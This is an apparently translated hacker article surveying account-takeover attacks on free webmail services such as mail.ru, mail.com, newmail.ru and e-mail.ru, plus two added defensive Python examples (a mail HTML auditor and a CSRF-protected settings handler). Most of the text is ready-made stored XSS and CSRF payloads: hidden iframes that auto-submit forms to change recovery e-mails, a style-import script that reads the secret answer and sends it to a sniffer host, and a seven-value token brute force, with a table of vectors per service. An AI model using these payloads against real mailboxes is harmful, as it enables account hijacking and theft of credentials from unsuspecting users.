
OVERVIEW OF VULNERABILITIES IN FREE WEBMAIL SERVICES

We continue with web mail. I did a bit of research into how various services can be broken into, and here are the results. The attack technique is the same throughout: a message containing JavaScript that fires when the message is opened is sent to the victim's address, and the script changes some piece of information in the settings of the victim's mailbox. There is no point in describing every server in detail, since the approach is the same everywhere, so I will give a few examples and finish with a table. In most cases the break-in can be considered 100% reliable, with a few assumptions: the user must read mail through the web interface, and when writing the exploits I assumed a standard platform, that is, I take it that the user is not running some exotic OS or a browser with JavaScript disabled.

WWW.MAIL.RU

I'll start with the number one mail service in Russia. At the moment, thanks to JavaScript getting through the filter and one developer mistake, it is possible to break into a mailbox here. I assume the basic principles are well known. How do you obtain the password? 1 - change it without authorisation. Won't work: you need to know the current one. 2 - change the secret question and use the service for those suffering from amnesia. Also won't work. 3 - set your own alternative e-mail address to receive a new password generated by the system. Won't work either: the last two options sit on the same form and are likewise protected by the password. Even the other settings, which interest us less (first name, surname, etc.), can no longer be changed without entering the current password. It would seem there are no options left. However, there is a secondary, inconspicuous settings section, "Contact Information" (ICQ, website, phone, place of work, time zone, etc.). In this section you can also specify a contact e-mail. The trick is that at the same time the alternative address in the registration data also changes to the one entered in the questionnaire, and now you can obtain the password for the mailbox through the reminder service. It's that simple. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru However, settings in a mail.ru mailbox cannot be changed with the GET method, so I will describe the technical side in detail.

I. We send a message to the target mailbox containing code that generates, directly in the body of the message, a frame pointing to our site. Ideally the script should run without any user interaction (click, mouse over, image loading, etc.):


 <embed src="javascript:document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.yourdomain.ru/yourscript.html></iframe>';this.wav">
 <p id='xxx'>
To make the script work reliably, and to disguise it, we transform it:
 <embed src="javascript:status=location;document.getElementById('xxx').innerHTML='<iframe src=http://yoursite.ru/yourscript.html width=0 height=0></iframe>';this.wav" width=0 height=0>
 <p id='xxx'>
In this form, the letters in the names javascript and iframe are replaced with character codes, which the mail script does not filter. The line status=location; shows a local URL in the status bar, so that the outgoing connection does not arouse suspicion. The width and height attributes of both the frame and the embed are set to zero, making them invisible.

II. On the site http://yoursite.ru we place an HTML document with a form that sends the modified data to the mail.ru server.

Contents of yourscript.html:
 <form method="post" action="http://win.mail.ru/cgi-bin/anketa" name="anketa">
 <input type="hidden" name="page" value="2">
 <input type="hidden" name="Email" value="hacker@antichat.ru">
 <input type="hidden" value="Save" name="Save">
 </form>
 <script>
 document.anketa.submit();
 </script>
Notes: the client part of the script is guaranteed to work in unchanged form only in IE; the submission form is placed on a separate site specifically to keep the message itself light.


WWW.MAIL.COM

Now a slightly different kind of security bug, using http://mail.com as the example. If you use the password reminder service, then to get the password it is enough to enter the correct answer to the secret question (one of the options offered). So we set ourselves the task of obtaining that answer. It is done easily. When I went into the mailbox properties and looked through the registration data, I saw that the answer to the secret question is not hidden, which lets us read its value with JavaScript.

We inject the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form name: profileform
Name of the text field holding the secret answer: hint_a
So, to steal the secret answer, you need to load the settings page, run JavaScript, read the value of document.profileform.hint_a.value, and pass it to the sniffer together with the environment variable REQUEST_URI.

Ready-made version:
 <style>@import url(javascript:document.getElementById('out').innerHTML="<iframe src=http://mail01.mail.com/scripts/common/genprofile.cgi name='zero' %6FnLoad=`str=document.zero.profileform.hint_a.value;path='http://zero.h12.ru/stat/capt.php?';document.zero.location=path+str`></iframe>");</style>
 <span id='out'></span>
The settings page is loaded into the generated frame named zero. Once it has loaded, the OnLoad handler runs the script that reads the secret answer and then, through the same frame, sends it to the sniffer. Now just go to http://zero.h12.ru/stat/log.php and find the needed information in the "Host" line.
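The entity-coded javascript: URL and the hidden embed/iframe from the mail.ru section, and the @import url(javascript:) trick from the mail.com section, are exactly what a webmail renderer's filter has to catch after decoding rather than before. The auditor below is an added example (not code from the article or from any of the services named): it decodes attribute values and style bodies the way a browser would and lists the active content in a constructed mail body; attribute names are percent-decoded as well, so the %6FnLoad spelling of onLoad is caught. It assumes only Python's standard library.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Attribute names that carry a URL, or (style) may embed one via url(...). Constructed list.
URL_ATTRS = {"src", "href", "action", "background", "data", "style"}
ACTIVE_TAGS = {"script", "embed", "iframe", "object", "style"}
CONTROL = re.compile(r"[\x00-\x20]+")

def has_script_url(text):
    """True if the text carries a javascript: or vbscript: scheme once HTML entities are
    decoded and whitespace/control bytes removed (how a browser reads it). Conservative:
    a match anywhere in the value counts."""
    collapsed = CONTROL.sub("", html.unescape(text or "")).lower()
    return "javascript:" in collapsed or "vbscript:" in collapsed

class MailHtmlAuditor(HTMLParser):
    """Lists the reasons an HTML mail body must not be rendered as-is."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self._cdata_tag = None  # set while inside <style> or <script>

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active element <{tag}>")
        if tag in ("style", "script"):
            self._cdata_tag = tag
        for name, value in attrs:
            # Normalise the attribute name too: the mail.com payload writes onLoad as %6FnLoad.
            name = unquote(html.unescape(name)).lower()
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and has_script_url(value):
                self.findings.append(f"script URL in {name} on <{tag}>")

    def handle_endtag(self, tag):
        if tag == self._cdata_tag:
            self._cdata_tag = None

    def handle_data(self, data):
        # <style>/<script> bodies arrive raw; @import url(javascript:...) lives here.
        if self._cdata_tag and has_script_url(data):
            self.findings.append(f"script URL inside <{self._cdata_tag}>")

def audit_mail_html(body):
    """Return the findings for one HTML mail body; an empty list means nothing active was found."""
    auditor = MailHtmlAuditor()
    auditor.feed(body)
    auditor.close()
    return auditor.findings
```

A renderer would refuse to display, or strip, any body with a non-empty result rather than trying to patch individual tags.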

WWW.NEWMAIL.RU

In my opinion quite a popular mail service, so I will describe it in detail. Moreover, it is much easier to get hold of someone else's account here than it seems at first glance. One could do it like this: send a message with a script that, when run, obtains the session id, generates the necessary requests, and changes the alternative e-mail setting (to which the password will later be sent) as well as the secret question and answer. However, if you specify any other address in the reminder form, the password will be sent there as long as the secret answer is correct. And another observation: the session id is not needed at all to change settings. Plus, any tags are allowed. All of this reduces the code to a couple of lines:
 <iframe src=http://newmail.ru/users/chpass.dhtml?cp_msg=1&cp_quest=QUESTION&cp_answ=ANSWER width=0 height=0></iframe>

WWW.E-MAIL.RU

The e-mail.ru method does not quite fit the general theme of the article, but it is still mail :). When I needed to get the password for one mailbox, I registered an account normally and started investigating the system. The first thing that caught my eye was the ability to set a new password and a secret question with answer without entering the old password. The usual plan: check the tag filtering, get the ID and execute the request. However, settings changes used a special variable utoken contained in the body of the document. Experimenting with changing the question and answer using a previously known utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ I came to the conclusion that neither the ID nor cookies are required to change settings. Also, observing utoken, I found that the four-digit hexadecimal number after the e-mail address in email@e-mail.ru-5a00 lies in a very narrow range. Namely, to set a secret question and answer on any mailbox of interest, you only need to try 7 options: 5a00, 5b00, 5c00, 5d00, 5e00, 5f00, 6000. When the number is guessed, we get into the right mailbox.

Notes: some things have changed since. The password recovery service does not work, so it makes sense to change the password straight away. The address for changing the settings has also changed:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ The method does not work every time. Probably the user still has to have logged into the mail through the web at some point.
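The mail.ru contact-information form, the newmail.ru settings page that needs no session id, and the e-mail.ru utoken all fail in the same two ways: the password check is tied to one form rather than to the sensitive fields, and the request carries nothing an outside page cannot supply (no token, or one drawn from seven values). Below is an added example, not code from the article or from any of the services, of a settings handler that enforces both rules; the account record, session ids and form contents are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed for this example: a process-wide secret (real code keeps it out of
# source) and the set of fields that influence account recovery.
SERVER_SECRET = secrets.token_bytes(32)
RECOVERY_FIELDS = {"password", "alt_email", "secret_question", "secret_answer"}

def issue_csrf_token(session_id):
    """Bind the settings-form token to the login session with an HMAC. It cannot be
    enumerated the way a token drawn from seven values (5a00..6000) can, and it is
    worthless when replayed against another session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def token_valid(session_id, submitted):
    """Constant-time comparison; a missing token fails closed."""
    if not session_id or not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)

def password_ok(account, supplied):
    """Constant-time check of the current password (stored plain here only because
    the account is a constructed dict; real storage holds a password hash)."""
    return supplied is not None and hmac.compare_digest(
        account["password"].encode(), supplied.encode())

def apply_settings(account, session_id, form, csrf_token, current_password=None):
    """Handle one settings POST. Returns (ok, reason). The password rule is applied
    per field, not per form: any submitted field that influences recovery needs the
    current password, whichever page (profile, contact information, ...) posted it."""
    if not token_valid(session_id, csrf_token):
        return False, "missing or foreign csrf token"
    sensitive = sorted(RECOVERY_FIELDS & set(form))
    if sensitive and not password_ok(account, current_password):
        return False, "current password required for " + ",".join(sensitive)
    account.update(form)
    return True, "ok"
```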

Table of characteristics of free webmail servers

SERVER                            | OTHER DOMAINS                                                                       | JAVASCRIPT VECTOR                                       | VULNERABILITY
www.km.ru                         | km.ru                                                                               | img src=javascript:                                     | Lets you read the password from the password field on the settings page
www.mail.ru                       | inbox.ru, bk.ru, list.ru                                                            | embed src=javascript:                                   | The alternate e-mail can be changed
www.mail.com                      | email.com, post.com, myself.com, consultant.com, etc.                               | @import url(javascript:);                               | The settings page shows the answer to the secret question
www.newmail.ru                    | nm.ru, hotmail.ru, orc.ru, nightmail.ru                                             | Any                                                     | Read/change the question and answer. Password is valid
www.netman.ru and www.mailgate.ru | same mailer, about 80 domains                                                       | img src=javascript:, style=background:url(javascript:)  | The secret answer can be stolen if one is set. A forwarding address can also be set (copies are not kept)
www.yandex.ru                     |                                                                                     | OnError, OnLoad                                         | Deletion of the *.narod.ru site (JS not required)
www.ukr.net                       |                                                                                     | embed src=javascript:this.wav>                          | Read the answer to the secret question
www.nextmail.ru                   | xaker.ru, email.su, russian.ru, students.ru, programist.ru, designer.ru, mail2k.ru  | embed src="javascript:                                  | Change/steal the secret answer
www.hotbox.ru                     | pochta.ru, pisem.net, fromru.com, land.ru, and others                               | Many ways                                               | Account deletion
www.rin.ru                        |                                                                                     | embed src=javascript:                                   | Read the secret answer